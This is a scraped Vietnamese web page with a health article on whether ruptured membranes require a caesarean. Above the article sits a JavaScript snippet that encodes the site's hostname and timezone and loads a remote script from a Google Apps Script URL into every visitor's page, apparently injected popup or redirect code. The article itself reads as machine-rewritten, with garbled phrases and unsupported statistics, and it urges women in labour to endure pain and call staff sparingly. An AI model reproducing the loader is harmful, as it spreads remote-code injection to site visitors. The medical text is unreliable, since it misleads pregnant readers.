var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Mẹ bị vỡ ối có cần mổ ngay không?

Không cần phẫu thuật khi vỡ ối vì vẫn có thể sinh con bình thường.

Image result for vỡ ối

Ảnh minh họa cho tình trạng mẹ bầu bị vỡ ối.

Nếu tim thai bình thường, bác sĩ sẽ theo dõi cổ tử cung để xem xét khả năng mở tự nhiên. Mổ sẽ chỉ được thực hiện khi không còn lựa chọn khác.

Do mổ phẫu thuật không phải là một phương pháp hoàn toàn an toàn, có một số người (tỷ lệ 1/20.000 người) có thể gặp phản ứng phản vệ và tử vong.

Nếu mổ một lần rồi, 50% số người sẽ phải mổ lại trong lần sau.

Nếu bạn quyết định phẫu thuật, bạn sẽ phải chi tiêu nhiều tiền hơn, mất nhiều máu hơn, dùng nhiều thuốc hơn, quá trình hồi phục cũng sẽ lâu hơn và bạn sẽ cảm thấy đau đớn hơn… Tuy nhiên, nếu bạn kiêng khem quá mức, sức khỏe sẽ bị suy giảm và có thể gặp nguy cơ bị nhiễm trùng và nứt vết mổ.

Khi cổ tử cung đã mở 3 – 4 cm, việc thoát sản dịch sẽ được cải thiện, tử cung sẽ phục hồi nhanh chóng và mẹ sẽ hồi phục nhanh hơn. Đồng thời, em bé sẽ được trải qua những cơn gò chuyển dạ khi ra đời, giúp sức chống đỡ của em bé tốt hơn.

Khi đẻ theo phương pháp tự nhiên, khi bé đi qua khung chậu ngực, áp lực sẽ giúp các chất lỏng trong phổi được thoát ra ngoài, giúp làm sạch phổi.

Khi xảy ra vết thương, sau đủ thời gian quy định, bác sĩ sẽ tiêm thuốc kháng sinh để ngăn chặn sự nhiễm trùng.

Theo dõi thai nhi khi có nguy cơ ối đã vỡ sẽ có lợi hơn cho sức khỏe của mẹ, bởi khi ối đã vỡ, vết mổ trên bụng sẽ dễ bị nhiễm trùng do độ dài của vết rạch.

Việc trẻ sơ sinh bị nhiễm trùng ối không chỉ phụ thuộc vào việc không mổ sớm mà còn phụ thuộc vào nhiều yếu tố khác.

Việc sử dụng kháng sinh là giải pháp hàng đầu và quan trọng nhất trong trường hợp trẻ em bị nhiễm trùng ối. Kháng sinh có khả năng chống lại vi khuẩn và khi nhiễm trùng xảy ra, vi khuẩn thường là nguyên nhân chính. Vì vậy, việc sử dụng kháng sinh là phương pháp điều trị hiệu quả nhất.

Khi nằm chờ sinh, bác sĩ không khám nhiều sẽ khiến bệnh nhân lầm tưởng rằng bác sĩ không quan tâm. Tuy nhiên, thực tế không phải như vậy. Vì khám liên tục có thể làm cho cổ tử cung sưng nề lên và khó mở ra. Hơn nữa, mặc dù bác sĩ sử dụng găng vô khuẩn khi khám, âm đạo và âm hộ của bạn không hoàn toàn vô khuẩn. Do đó, mỗi lần đưa tay vào, vi khuẩn cũng sẽ đi kèm. Đặc biệt là khi đã vỡ ối, việc khám ít lần càng tốt, chỉ khi thực sự cần thiết.

Trong căn phòng sinh, luôn có một chiếc bàn dành cho bác sĩ làm việc. Dù bạn không thể nhìn thấy họ, nhưng họ vẫn có thể nhìn thấy bạn. Bất kỳ khi nào bạn cần, chỉ cần gọi và họ sẽ nghe thấy.

Tuy nhiên, trong số thai phụ, có những người đa dạng, có người có khả năng chịu đựng tốt trong khi có người lại sợ hãi và liên tục gọi dù không có vấn đề quan trọng.

Hãy cố gắng và chấp nhận đau đớn khi sinh con, vì nếu không có đau đớn thì không thể sinh con được. Hãy gọi nhân viên y tế chỉ khi cần thiết, vì nếu gọi quá nhiều lần mà không có vấn đề gì, sẽ dẫn đến hiểu lầm và khi bạn gặp vấn đề thực sự, có thể bị bỏ qua vì đã gọi quá nhiều lần mà không có vấn đề nghiêm trọng.

Trong quá trình mang thai, nếu bạn có bất kỳ thắc mắc nào liên quan đến sức khỏe của mẹ và thai nhi cần giải đáp, hãy sử dụng dịch vụ Gọi thoại – Gọi Video Khám Từ Xa với bác sĩ chuyên khoa Phụ sản để nhận được tư vấn và hướng dẫn cách xử trí.